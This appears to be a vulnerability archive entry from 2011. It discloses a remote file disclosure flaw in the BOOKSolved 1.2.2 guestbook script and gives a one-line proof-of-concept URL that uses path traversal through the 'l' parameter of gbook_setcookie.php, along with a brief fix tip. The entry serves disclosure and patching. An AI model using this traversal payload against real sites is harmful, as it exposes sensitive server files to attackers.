BOOKSolved 1.2.2 File Disclosure

2011-10-09 / 2011-10-10

Credit: bd0rk

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

...BOOKSolved 1.2.2 (l) Remote File Disclosure Vulnerability
 
...Discovered by bd0rk
 
...Contact: bd0rk[at]hackermail.com or follow me on twitter
 
...Greetz: inj3ct0r-Team, x0r_32, Perle, Siber King
 
...Tested on: Ubuntu-Linux
 
...MEZ-Time: 08:17
 
...Vendor: http://www.usolved.net/
 
...Download: http://www.usolved.net/scripts/booksolved_v1.2.2.zip
 
----------------------------------------------------------------------------
 
PoC: http://[targethost]/[path]/inc/gbook_setcookie.php?l=../../R3adIn.php
 
----------------------------------------------------------------------------
 
Description: Found vulnerable code in gbook_setcookie.php line 7.
             So an attacker can read in sensitive files about l-parameter.
 
bd0rk's-Fixtip: Percolate the l-parameter before $_GET
 
Greetings from Germany, the 22 years old bd0rk.

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

BOOKSolved 1.2.2 File Disclosure

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

BOOKSolved 1.2.2 File Disclosure

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.